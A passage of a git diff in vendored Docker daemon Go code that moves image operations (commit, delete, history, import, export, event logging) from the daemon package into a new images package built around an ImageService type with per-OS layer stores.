+func (i *ImageService) GetImageAndReleasableLayer(ctx context.Context, refOrID string, opts backend.GetImageAndLayerOptions) (builder.Image, builder.ROLayer, error) {
+	if refOrID == "" {
+		if !system.IsOSSupported(opts.OS) {
+			return nil, nil, system.ErrNotSupportedOperatingSystem
+		}
+		layer, err := newROLayerForImage(nil, i.layerStores[opts.OS])
+		return nil, layer, err
+	}
+
+	if opts.PullOption != backend.PullOptionForcePull {
+		image, err := i.GetImage(refOrID)
+		if err != nil && opts.PullOption == backend.PullOptionNoPull {
+			return nil, nil, err
+		}
+		// TODO: shouldn't we error out if error is different from "not found" ?
+		if image != nil {
+			if !system.IsOSSupported(image.OperatingSystem()) {
+				return nil, nil, system.ErrNotSupportedOperatingSystem
+			}
+			layer, err := newROLayerForImage(image, i.layerStores[image.OperatingSystem()])
+			return image, layer, err
+		}
+	}
+
+	image, err := i.pullForBuilder(ctx, refOrID, opts.AuthConfig, opts.Output, opts.OS)
+	if err != nil {
+		return nil, nil, err
+	}
+	if !system.IsOSSupported(image.OperatingSystem()) {
+		return nil, nil, system.ErrNotSupportedOperatingSystem
+	}
+	layer, err := newROLayerForImage(image, i.layerStores[image.OperatingSystem()])
+	return image, layer, err
+}
+
+// CreateImage creates a new image by adding a config and ID to the image store.
+// This is similar to LoadImage() except that it receives JSON encoded bytes of
+// an image instead of a tar archive.
+func (i *ImageService) CreateImage(config []byte, parent string) (builder.Image, error) {
+	id, err := i.imageStore.Create(config)
+	if err != nil {
+		return nil, errors.Wrapf(err, "failed to create image")
+	}
+
+	if parent != "" {
+		if err := i.imageStore.SetParent(id, image.ID(parent)); err != nil {
+			return nil, errors.Wrapf(err, "failed to set parent %s", parent)
+		}
+	}
+
+	return i.imageStore.Get(id)
+}
diff --git a/vendor/github.com/docker/docker/daemon/images/image_commit.go b/vendor/github.com/docker/docker/daemon/images/image_commit.go
new file mode 100644
index 0000000000..4caba9f27b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images/image_commit.go
@@ -0,0 +1,127 @@
+package images // import "github.com/docker/docker/daemon/images"
+
+import (
+	"encoding/json"
+	"io"
+
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/system"
+	"github.com/pkg/errors"
+)
+
+// CommitImage creates a new image from a commit config
+func (i *ImageService) CommitImage(c backend.CommitConfig) (image.ID, error) {
+	layerStore, ok := i.layerStores[c.ContainerOS]
+	if !ok {
+		return "", system.ErrNotSupportedOperatingSystem
+	}
+	rwTar, err := exportContainerRw(layerStore, c.ContainerID, c.ContainerMountLabel)
+	if err != nil {
+		return "", err
+	}
+	defer func() {
+		if rwTar != nil {
+			rwTar.Close()
+		}
+	}()
+
+	var parent *image.Image
+	if c.ParentImageID == "" {
+		parent = new(image.Image)
+		parent.RootFS = image.NewRootFS()
+	} else {
+		parent, err = i.imageStore.Get(image.ID(c.ParentImageID))
+		if err != nil {
+			return "", err
+		}
+	}
+
+	l, err := layerStore.Register(rwTar, parent.RootFS.ChainID())
+	if err != nil {
+		return "", err
+	}
+	defer layer.ReleaseAndLog(layerStore, l)
+
+	cc := image.ChildConfig{
+		ContainerID:     c.ContainerID,
+		Author:          c.Author,
+		Comment:         c.Comment,
+		ContainerConfig: c.ContainerConfig,
+		Config:          c.Config,
+		DiffID:          l.DiffID(),
+	}
+	config, err := json.Marshal(image.NewChildImage(parent, cc, c.ContainerOS))
+	if err != nil {
+		return "", err
+	}
+
+	id, err := i.imageStore.Create(config)
+	if err != nil {
+		return "", err
+	}
+
+	if c.ParentImageID != "" {
+		if err := i.imageStore.SetParent(id, image.ID(c.ParentImageID)); err != nil {
+			return "", err
+		}
+	}
+	return id, nil
+}
+
+func exportContainerRw(layerStore layer.Store, id, mountLabel string) (arch io.ReadCloser, err error) {
+	rwlayer, err := layerStore.GetRWLayer(id)
+	if err != nil {
+		return nil, err
+	}
+	defer func() {
+		if err != nil {
+			layerStore.ReleaseRWLayer(rwlayer)
+		}
+	}()
+
+	// TODO: this mount call is not necessary as we assume that TarStream() should
+	// mount the layer if needed. But the Diff() function for windows requests that
+	// the layer should be mounted when calling it. So we reserve this mount call
+	// until windows driver can implement Diff() interface correctly.
+	_, err = rwlayer.Mount(mountLabel)
+	if err != nil {
+		return nil, err
+	}
+
+	archive, err := rwlayer.TarStream()
+	if err != nil {
+		rwlayer.Unmount()
+		return nil, err
+	}
+	return ioutils.NewReadCloserWrapper(archive, func() error {
+			archive.Close()
+			err = rwlayer.Unmount()
+			layerStore.ReleaseRWLayer(rwlayer)
+			return err
+		}),
+		nil
+}
+
+// CommitBuildStep is used by the builder to create an image for each step in
+// the build.
+//
+// This method is different from CreateImageFromContainer:
+//   * it doesn't attempt to validate container state
+//   * it doesn't send a commit action to metrics
+//   * it doesn't log a container commit event
+//
+// This is a temporary shim. Should be removed when builder stops using commit.
+func (i *ImageService) CommitBuildStep(c backend.CommitConfig) (image.ID, error) {
+	container := i.containers.Get(c.ContainerID)
+	if container == nil {
+		// TODO: use typed error
+		return "", errors.Errorf("container not found: %s", c.ContainerID)
+	}
+	c.ContainerMountLabel = container.MountLabel
+	c.ContainerOS = container.OS
+	c.ParentImageID = string(container.ImageID)
+	return i.CommitImage(c)
+}
diff --git a/vendor/github.com/docker/docker/daemon/image_delete.go b/vendor/github.com/docker/docker/daemon/images/image_delete.go
similarity index 72%
rename from vendor/github.com/docker/docker/daemon/image_delete.go
rename to vendor/github.com/docker/docker/daemon/images/image_delete.go
index 3e3c142e9c..94d6f872dd 100644
--- a/vendor/github.com/docker/docker/daemon/image_delete.go
+++ b/vendor/github.com/docker/docker/daemon/images/image_delete.go
@@ -1,22 +1,24 @@
-package daemon
+package images // import "github.com/docker/docker/daemon/images"
 
 import (
 	"fmt"
 	"strings"
 	"time"
 
-	"github.com/docker/docker/api/errors"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/reference"
+	"github.com/docker/docker/pkg/system"
+	"github.com/pkg/errors"
 )
 
 type conflictType int
 
 const (
-	conflictDependentChild conflictType = (1 << iota)
+	conflictDependentChild conflictType = 1 << iota
 	conflictRunningContainer
 	conflictActiveReference
 	conflictStoppedContainer
@@ -58,19 +60,24 @@ const (
 // meaning any delete conflicts will cause the image to not be deleted and the
 // conflict will not be reported.
 //
-// FIXME: remove ImageDelete's dependency on Daemon, then move to the graph
-// package. This would require that we no longer need the daemon to determine
-// whether images are being used by a stopped or running container.
-func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.ImageDelete, error) {
+func (i *ImageService) ImageDelete(imageRef string, force, prune bool) ([]types.ImageDeleteResponseItem, error) {
 	start := time.Now()
-	records := []types.ImageDelete{}
+	records := []types.ImageDeleteResponseItem{}
 
-	imgID, err := daemon.GetImageID(imageRef)
+	img, err := i.GetImage(imageRef)
 	if err != nil {
-		return nil, daemon.imageNotExistToErrcode(err)
+		return nil, err
+	}
+	if !system.IsOSSupported(img.OperatingSystem()) {
+		return nil, errors.Errorf("unable to delete image: %q", system.ErrNotSupportedOperatingSystem)
 	}
 
-	repoRefs := daemon.referenceStore.References(imgID.Digest())
+	imgID := img.ID()
+	repoRefs := i.referenceStore.References(imgID.Digest())
+
+	using := func(c *container.Container) bool {
+		return c.ImageID == imgID
+	}
 
 	var removedRepositoryRef bool
 	if !isImageIDPrefix(imgID.String(), imageRef) {
@@ -79,32 +86,32 @@ func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.I
 		// true, there are multiple repository references to this
 		// image, or there are no containers using the given reference.
 		if !force && isSingleReference(repoRefs) {
-			if container := daemon.getContainerUsingImage(imgID); container != nil {
+			if container := i.containers.First(using); container != nil {
 				// If we removed the repository reference then
 				// this image would remain "dangling" and since
 				// we really want to avoid that the client must
 				// explicitly force its removal.
-				err := fmt.Errorf("conflict: unable to remove repository reference %q (must force) - container %s is using its referenced image %s", imageRef, stringid.TruncateID(container.ID), stringid.TruncateID(imgID.String()))
-				return nil, errors.NewRequestConflictError(err)
+				err := errors.Errorf("conflict: unable to remove repository reference %q (must force) - container %s is using its referenced image %s", imageRef, stringid.TruncateID(container.ID), stringid.TruncateID(imgID.String()))
+				return nil, errdefs.Conflict(err)
 			}
 		}
 
-		parsedRef, err := reference.ParseNamed(imageRef)
+		parsedRef, err := reference.ParseNormalizedNamed(imageRef)
 		if err != nil {
 			return nil, err
 		}
 
-		parsedRef, err = daemon.removeImageRef(parsedRef)
+		parsedRef, err = i.removeImageRef(parsedRef)
 		if err != nil {
 			return nil, err
 		}
 
-		untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()}
+		untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(parsedRef)}
 
-		daemon.LogImageEvent(imgID.String(), imgID.String(), "untag")
+		i.LogImageEvent(imgID.String(), imgID.String(), "untag")
 		records = append(records, untaggedRecord)
 
-		repoRefs = daemon.referenceStore.References(imgID.Digest())
+		repoRefs = i.referenceStore.References(imgID.Digest())
 
 		// If a tag reference was removed and the only remaining
 		// references to the same repository are digest references,
@@ -119,14 +126,14 @@ func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.I
 			}
 			if !foundRepoTagRef {
 				// Remove canonical references from same repository
-				remainingRefs := []reference.Named{}
+				var remainingRefs []reference.Named
 				for _, repoRef := range repoRefs {
 					if _, repoRefIsCanonical := repoRef.(reference.Canonical); repoRefIsCanonical && parsedRef.Name() == repoRef.Name() {
-						if _, err := daemon.removeImageRef(repoRef); err != nil {
+						if _, err := i.removeImageRef(repoRef); err != nil {
 							return records, err
 						}
 
-						untaggedRecord := types.ImageDelete{Untagged: repoRef.String()}
+						untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(repoRef)}
 						records = append(records, untaggedRecord)
 					} else {
 						remainingRefs = append(remainingRefs, repoRef)
@@ -152,25 +159,25 @@ func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.I
 			if !force {
 				c |= conflictSoft &^ conflictActiveReference
 			}
-			if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil {
+			if conflict := i.checkImageDeleteConflict(imgID, c); conflict != nil {
 				return nil, conflict
 			}
 
 			for _, repoRef := range repoRefs {
-				parsedRef, err := daemon.removeImageRef(repoRef)
+				parsedRef, err := i.removeImageRef(repoRef)
 				if err != nil {
 					return nil, err
 				}
 
-				untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()}
+				untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(parsedRef)}
 
-				daemon.LogImageEvent(imgID.String(), imgID.String(), "untag")
+				i.LogImageEvent(imgID.String(), imgID.String(), "untag")
 				records = append(records, untaggedRecord)
 			}
 		}
 	}
 
-	if err := daemon.imageDeleteHelper(imgID, &records, force, prune, removedRepositoryRef); err != nil {
+	if err := i.imageDeleteHelper(imgID, &records, force, prune, removedRepositoryRef); err != nil {
 		return nil, err
 	}
 
@@ -218,25 +225,18 @@ func isImageIDPrefix(imageID, possiblePrefix string) bool {
 	return false
 }
 
-// getContainerUsingImage returns a container that was created using the given
-// imageID. Returns nil if there is no such container.
-func (daemon *Daemon) getContainerUsingImage(imageID image.ID) *container.Container {
-	return daemon.containers.First(func(c *container.Container) bool {
-		return c.ImageID == imageID
-	})
-}
-
 // removeImageRef attempts to parse and remove the given image reference from
 // this daemon's store of repository tag/digest references. The given
 // repositoryRef must not be an image ID but a repository name followed by an
 // optional tag or digest reference. If tag or digest is omitted, the default
 // tag is used. Returns the resolved image reference and an error.
-func (daemon *Daemon) removeImageRef(ref reference.Named) (reference.Named, error) {
-	ref = reference.WithDefaultTag(ref)
+func (i *ImageService) removeImageRef(ref reference.Named) (reference.Named, error) {
+	ref = reference.TagNameOnly(ref)
+
 	// Ignore the boolean value returned, as far as we're concerned, this
 	// is an idempotent operation and it's okay if the reference didn't
 	// exist in the first place.
-	_, err := daemon.referenceStore.Delete(ref)
+	_, err := i.referenceStore.Delete(ref)
 
 	return ref, err
 }
@@ -244,20 +244,20 @@ func (daemon *Daemon) removeImageRef(ref reference.Named) (reference.Named, erro
 // removeAllReferencesToImageID attempts to remove every reference to the given
 // imgID from this daemon's store of repository tag/digest references. Returns
 // on the first encountered error. Removed references are logged to this
-// daemon's event service. An "Untagged" types.ImageDelete is added to the
+// daemon's event service. An "Untagged" types.ImageDeleteResponseItem is added to the
 // given list of records.
-func (daemon *Daemon) removeAllReferencesToImageID(imgID image.ID, records *[]types.ImageDelete) error {
-	imageRefs := daemon.referenceStore.References(imgID.Digest())
+func (i *ImageService) removeAllReferencesToImageID(imgID image.ID, records *[]types.ImageDeleteResponseItem) error {
+	imageRefs := i.referenceStore.References(imgID.Digest())
 
 	for _, imageRef := range imageRefs {
-		parsedRef, err := daemon.removeImageRef(imageRef)
+		parsedRef, err := i.removeImageRef(imageRef)
 		if err != nil {
 			return err
 		}
 
-		untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()}
+		untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(parsedRef)}
 
-		daemon.LogImageEvent(imgID.String(), imgID.String(), "untag")
+		i.LogImageEvent(imgID.String(), imgID.String(), "untag")
 		*records = append(*records, untaggedRecord)
 	}
 
@@ -284,6 +284,8 @@ func (idc *imageDeleteConflict) Error() string {
 	return fmt.Sprintf("conflict: unable to delete %s (%s) - %s", stringid.TruncateID(idc.imgID.String()), forceMsg, idc.message)
 }
 
+func (idc *imageDeleteConflict) Conflict() {}
+
 // imageDeleteHelper attempts to delete the given image from this daemon. If
 // the image has any hard delete conflicts (child images or running containers
 // using the image) then it cannot be deleted. If the image has any soft delete
@@ -295,15 +297,15 @@ func (idc *imageDeleteConflict) Error() string {
 // conflict is encountered, it will be returned immediately without deleting
 // the image. If quiet is true, any encountered conflicts will be ignored and
 // the function will return nil immediately without deleting the image.
-func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDelete, force, prune, quiet bool) error {
+func (i *ImageService) imageDeleteHelper(imgID image.ID, records *[]types.ImageDeleteResponseItem, force, prune, quiet bool) error {
 	// First, determine if this image has any conflicts. Ignore soft conflicts
 	// if force is true.
 	c := conflictHard
 	if !force {
 		c |= conflictSoft
 	}
-	if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil {
-		if quiet && (!daemon.imageIsDangling(imgID) || conflict.used) {
+	if conflict := i.checkImageDeleteConflict(imgID, c); conflict != nil {
+		if quiet && (!i.imageIsDangling(imgID) || conflict.used) {
 			// Ignore conflicts UNLESS the image is "dangling" or not being used in
 			// which case we want the user to know.
 			return nil
@@ -314,26 +316,26 @@ func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDe
 		return conflict
 	}
 
-	parent, err := daemon.imageStore.GetParent(imgID)
+	parent, err := i.imageStore.GetParent(imgID)
 	if err != nil {
 		// There may be no parent
 		parent = ""
 	}
 
 	// Delete all repository tag/digest references to this image.
-	if err := daemon.removeAllReferencesToImageID(imgID, records); err != nil {
+	if err := i.removeAllReferencesToImageID(imgID, records); err != nil {
 		return err
 	}
 
-	removedLayers, err := daemon.imageStore.Delete(imgID)
+	removedLayers, err := i.imageStore.Delete(imgID)
 	if err != nil {
 		return err
 	}
 
-	daemon.LogImageEvent(imgID.String(), imgID.String(), "delete")
-	*records = append(*records, types.ImageDelete{Deleted: imgID.String()})
+	i.LogImageEvent(imgID.String(), imgID.String(), "delete")
+	*records = append(*records, types.ImageDeleteResponseItem{Deleted: imgID.String()})
 	for _, removedLayer := range removedLayers {
-		*records = append(*records, types.ImageDelete{Deleted: removedLayer.ChainID.String()})
+		*records = append(*records, types.ImageDeleteResponseItem{Deleted: removedLayer.ChainID.String()})
 	}
 
 	if !prune || parent == "" {
@@ -345,7 +347,7 @@ func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDe
 	// either running or stopped).
 	// Do not force prunings, but do so quietly (stopping on any encountered
 	// conflicts).
-	return daemon.imageDeleteHelper(parent, records, false, true, true)
+	return i.imageDeleteHelper(parent, records, false, true, true)
 }
 
 // checkImageDeleteConflict determines whether there are any conflicts
@@ -354,9 +356,9 @@ func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDe
 // using the image. A soft conflict is any tags/digest referencing the given
 // image or any stopped container using the image. If ignoreSoftConflicts is
 // true, this function will not check for soft conflict conditions.
-func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType) *imageDeleteConflict {
+func (i *ImageService) checkImageDeleteConflict(imgID image.ID, mask conflictType) *imageDeleteConflict {
 	// Check if the image has any descendant images.
-	if mask&conflictDependentChild != 0 && len(daemon.imageStore.Children(imgID)) > 0 {
+	if mask&conflictDependentChild != 0 && len(i.imageStore.Children(imgID)) > 0 {
 		return &imageDeleteConflict{
 			hard:    true,
 			imgID:   imgID,
@@ -369,7 +371,7 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType
 		running := func(c *container.Container) bool {
 			return c.IsRunning() && c.ImageID == imgID
 		}
-		if container := daemon.containers.First(running); container != nil {
+		if container := i.containers.First(running); container != nil {
 			return &imageDeleteConflict{
 				imgID:   imgID,
 				hard:    true,
@@ -380,7 +382,7 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType
 	}
 
 	// Check if any repository tags/digest reference this image.
-	if mask&conflictActiveReference != 0 && len(daemon.referenceStore.References(imgID.Digest())) > 0 {
+	if mask&conflictActiveReference != 0 && len(i.referenceStore.References(imgID.Digest())) > 0 {
 		return &imageDeleteConflict{
 			imgID:   imgID,
 			message: "image is referenced in multiple repositories",
@@ -392,7 +394,7 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType
 		stopped := func(c *container.Container) bool {
 			return !c.IsRunning() && c.ImageID == imgID
 		}
-		if container := daemon.containers.First(stopped); container != nil {
+		if container := i.containers.First(stopped); container != nil {
 			return &imageDeleteConflict{
 				imgID:   imgID,
 				used:    true,
@@ -407,6 +409,6 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType
 // imageIsDangling returns whether the given image is "dangling" which means
 // that there are no repository references to the given image and it has no
 // child images.
-func (daemon *Daemon) imageIsDangling(imgID image.ID) bool {
-	return !(len(daemon.referenceStore.References(imgID.Digest())) > 0 || len(daemon.imageStore.Children(imgID)) > 0)
+func (i *ImageService) imageIsDangling(imgID image.ID) bool {
+	return !(len(i.referenceStore.References(imgID.Digest())) > 0 || len(i.imageStore.Children(imgID)) > 0)
 }
diff --git a/vendor/github.com/docker/docker/daemon/images/image_events.go b/vendor/github.com/docker/docker/daemon/images/image_events.go
new file mode 100644
index 0000000000..d0b3064d70
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images/image_events.go
@@ -0,0 +1,39 @@
+package images // import "github.com/docker/docker/daemon/images"
+
+import (
+	"github.com/docker/docker/api/types/events"
+)
+
+// LogImageEvent generates an event related to an image with only the default attributes.
+func (i *ImageService) LogImageEvent(imageID, refName, action string) {
+	i.LogImageEventWithAttributes(imageID, refName, action, map[string]string{})
+}
+
+// LogImageEventWithAttributes generates an event related to an image with specific given attributes.
+func (i *ImageService) LogImageEventWithAttributes(imageID, refName, action string, attributes map[string]string) {
+	img, err := i.GetImage(imageID)
+	if err == nil && img.Config != nil {
+		// image has not been removed yet.
+		// it could be missing if the event is `delete`.
+		copyAttributes(attributes, img.Config.Labels)
+	}
+	if refName != "" {
+		attributes["name"] = refName
+	}
+	actor := events.Actor{
+		ID:         imageID,
+		Attributes: attributes,
+	}
+
+	i.eventsService.Log(action, events.ImageEventType, actor)
+}
+
+// copyAttributes guarantees that labels are not mutated by event triggers.
+func copyAttributes(attributes, labels map[string]string) {
+	if labels == nil {
+		return
+	}
+	for k, v := range labels {
+		attributes[k] = v
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/image_exporter.go b/vendor/github.com/docker/docker/daemon/images/image_exporter.go
similarity index 61%
rename from vendor/github.com/docker/docker/daemon/image_exporter.go
rename to vendor/github.com/docker/docker/daemon/images/image_exporter.go
index 95d1d3dcdb..58105dcb71 100644
--- a/vendor/github.com/docker/docker/daemon/image_exporter.go
+++ b/vendor/github.com/docker/docker/daemon/images/image_exporter.go
@@ -1,4 +1,4 @@
-package daemon
+package images // import "github.com/docker/docker/daemon/images"
 
 import (
 	"io"
@@ -11,15 +11,15 @@ import (
 // stream. All images with the given tag and all versions containing
 // the same tag are exported. names is the set of tags to export, and
 // outStream is the writer which the images are written to.
-func (daemon *Daemon) ExportImage(names []string, outStream io.Writer) error {
-	imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon)
+func (i *ImageService) ExportImage(names []string, outStream io.Writer) error {
+	imageExporter := tarexport.NewTarExporter(i.imageStore, i.layerStores, i.referenceStore, i)
 	return imageExporter.Save(names, outStream)
 }
 
 // LoadImage uploads a set of images into the repository. This is the
 // complement of ImageExport.  The input stream is an uncompressed tar
 // ball containing images and metadata.
-func (daemon *Daemon) LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error {
-	imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon)
+func (i *ImageService) LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error {
+	imageExporter := tarexport.NewTarExporter(i.imageStore, i.layerStores, i.referenceStore, i)
 	return imageExporter.Load(inTar, outStream, quiet)
 }
diff --git a/vendor/github.com/docker/docker/daemon/image_history.go b/vendor/github.com/docker/docker/daemon/images/image_history.go
similarity index 60%
rename from vendor/github.com/docker/docker/daemon/image_history.go
rename to vendor/github.com/docker/docker/daemon/images/image_history.go
index 839dd1283b..b4ca25b1b6 100644
--- a/vendor/github.com/docker/docker/daemon/image_history.go
+++ b/vendor/github.com/docker/docker/daemon/images/image_history.go
@@ -1,24 +1,25 @@
-package daemon
+package images // import "github.com/docker/docker/daemon/images"
 
 import (
 	"fmt"
 	"time"
 
-	"github.com/docker/docker/api/types"
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types/image"
 	"github.com/docker/docker/layer"
-	"github.com/docker/docker/reference"
+	"github.com/docker/docker/pkg/system"
 )
 
 // ImageHistory returns a slice of ImageHistory structures for the specified image
 // name by walking the image lineage.
-func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) {
+func (i *ImageService) ImageHistory(name string) ([]*image.HistoryResponseItem, error) {
 	start := time.Now()
-	img, err := daemon.GetImage(name)
+	img, err := i.GetImage(name)
 	if err != nil {
 		return nil, err
 	}
 
-	history := []*types.ImageHistory{}
+	history := []*image.HistoryResponseItem{}
 
 	layerCounter := 0
 	rootFS := *img.RootFS
@@ -31,14 +32,16 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) {
 			if len(img.RootFS.DiffIDs) <= layerCounter {
 				return nil, fmt.Errorf("too many non-empty layers in History section")
 			}
-
+			if !system.IsOSSupported(img.OperatingSystem()) {
+				return nil, system.ErrNotSupportedOperatingSystem
+			}
 			rootFS.Append(img.RootFS.DiffIDs[layerCounter])
-			l, err := daemon.layerStore.Get(rootFS.ChainID())
+			l, err := i.layerStores[img.OperatingSystem()].Get(rootFS.ChainID())
 			if err != nil {
 				return nil, err
 			}
 			layerSize, err = l.DiffSize()
-			layer.ReleaseAndLog(daemon.layerStore, l)
+			layer.ReleaseAndLog(i.layerStores[img.OperatingSystem()], l)
 			if err != nil {
 				return nil, err
 			}
@@ -46,7 +49,7 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) {
 			layerCounter++
 		}
 
-		history = append([]*types.ImageHistory{{
+		history = append([]*image.HistoryResponseItem{{
 			ID:        "<missing>",
 			Created:   h.Created.Unix(),
 			CreatedBy: h.CreatedBy,
@@ -62,9 +65,9 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) {
 		h.ID = id.String()
 
 		var tags []string
-		for _, r := range daemon.referenceStore.References(id.Digest()) {
+		for _, r := range i.referenceStore.References(id.Digest()) {
 			if _, ok := r.(reference.NamedTagged); ok {
-				tags = append(tags, r.String())
+				tags = append(tags, reference.FamiliarString(r))
 			}
 		}
 
@@ -74,7 +77,7 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) {
 		if id == "" {
 			break
 		}
-		histImg, err = daemon.GetImage(id.String())
+		histImg, err = i.GetImage(id.String())
 		if err != nil {
 			break
 		}
diff --git a/vendor/github.com/docker/docker/daemon/import.go b/vendor/github.com/docker/docker/daemon/images/image_import.go
similarity index 60%
rename from vendor/github.com/docker/docker/daemon/import.go
rename to vendor/github.com/docker/docker/daemon/images/image_import.go
index c93322b92e..8d54e0704f 100644
--- a/vendor/github.com/docker/docker/daemon/import.go
+++ b/vendor/github.com/docker/docker/daemon/images/image_import.go
@@ -1,58 +1,63 @@
-package daemon
+package images // import "github.com/docker/docker/daemon/images"
 
 import (
 	"encoding/json"
-	"errors"
 	"io"
 	"net/http"
 	"net/url"
 	"runtime"
+	"strings"
 	"time"
 
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/builder/dockerfile"
+	"github.com/docker/docker/builder/remotecontext"
 	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
 	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/httputils"
 	"github.com/docker/docker/pkg/progress"
 	"github.com/docker/docker/pkg/streamformatter"
-	"github.com/docker/docker/reference"
+	"github.com/pkg/errors"
 )
 
 // ImportImage imports an image, getting the archived layer data either from
 // inConfig (if src is "-"), or from a URI specified in src. Progress output is
 // written to outStream. Repository and tag names can optionally be given in
 // the repo and tag arguments, respectively.
-func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error {
+func (i *ImageService) ImportImage(src string, repository, os string, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error {
 	var (
-		sf     = streamformatter.NewJSONStreamFormatter()
 		rc     io.ReadCloser
 		resp   *http.Response
 		newRef reference.Named
 	)
 
+	// Default the operating system if not supplied.
+	if os == "" {
+		os = runtime.GOOS
+	}
+
 	if repository != "" {
 		var err error
-		newRef, err = reference.ParseNamed(repository)
+		newRef, err = reference.ParseNormalizedNamed(repository)
 		if err != nil {
-			return err
+			return errdefs.InvalidParameter(err)
 		}
-
 		if _, isCanonical := newRef.(reference.Canonical); isCanonical {
-			return errors.New("cannot import digest reference")
+			return errdefs.InvalidParameter(errors.New("cannot import digest reference"))
 		}
 
 		if tag != "" {
 			newRef, err = reference.WithTag(newRef, tag)
 			if err != nil {
-				return err
+				return errdefs.InvalidParameter(err)
 			}
 		}
 	}
 
-	config, err := dockerfile.BuildFromConfig(&container.Config{}, changes)
+	config, err := dockerfile.BuildFromConfig(&container.Config{}, changes, os)
 	if err != nil {
 		return err
 	}
@@ -60,21 +65,20 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string
 		rc = inConfig
 	} else {
 		inConfig.Close()
+		if len(strings.Split(src, "://")) == 1 {
+			src = "http://" + src
+		}
 		u, err := url.Parse(src)
 		if err != nil {
-			return err
+			return errdefs.InvalidParameter(err)
 		}
-		if u.Scheme == "" {
-			u.Scheme = "http"
-			u.Host = src
-			u.Path = ""
-		}
-		outStream.Write(sf.FormatStatus("", "Downloading from %s", u))
-		resp, err = httputils.Download(u.String())
+
+		resp, err = remotecontext.GetWithStatusError(u.String())
 		if err != nil {
 			return err
 		}
-		progressOutput := sf.NewProgressOutput(outStream, true)
+		outStream.Write(streamformatter.FormatStatus("", "Downloading from %s", u))
+		progressOutput := streamformatter.NewJSONProgressOutput(outStream, true)
 		rc = progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Importing")
 	}
 
@@ -87,12 +91,11 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string
 	if err != nil {
 		return err
 	}
-	// TODO: support windows baselayer?
-	l, err := daemon.layerStore.Register(inflatedLayerData, "")
+	l, err := i.layerStores[os].Register(inflatedLayerData, "")
 	if err != nil {
 		return err
 	}
-	defer layer.ReleaseAndLog(daemon.layerStore, l)
+	defer layer.ReleaseAndLog(i.layerStores[os], l)
 
 	created := time.Now().UTC()
 	imgConfig, err := json.Marshal(&image.Image{
@@ -100,7 +103,7 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string
 			DockerVersion: dockerversion.Version,
 			Config:        config,
 			Architecture:  runtime.GOARCH,
-			OS:            runtime.GOOS,
+			OS:            os,
 			Created:       created,
 			Comment:       msg,
 		},
@@ -117,19 +120,19 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string
 		return err
 	}
 
-	id, err := daemon.imageStore.Create(imgConfig)
+	id, err := i.imageStore.Create(imgConfig)
 	if err != nil {
 		return err
 	}
 
 	// FIXME: connect with commit code and call refstore directly
 	if newRef != nil {
-		if err := daemon.TagImageWithReference(id, newRef); err != nil {
+		if err := i.TagImageWithReference(id, newRef); err != nil {
 			return err
 		}
 	}
 
-	daemon.LogImageEvent(id.String(), id.String(), "import")
-	outStream.Write(sf.FormatStatus("", id.String()))
+	i.LogImageEvent(id.String(), id.String(), "import")
+	outStream.Write(streamformatter.FormatStatus("", id.String()))
 	return nil
 }
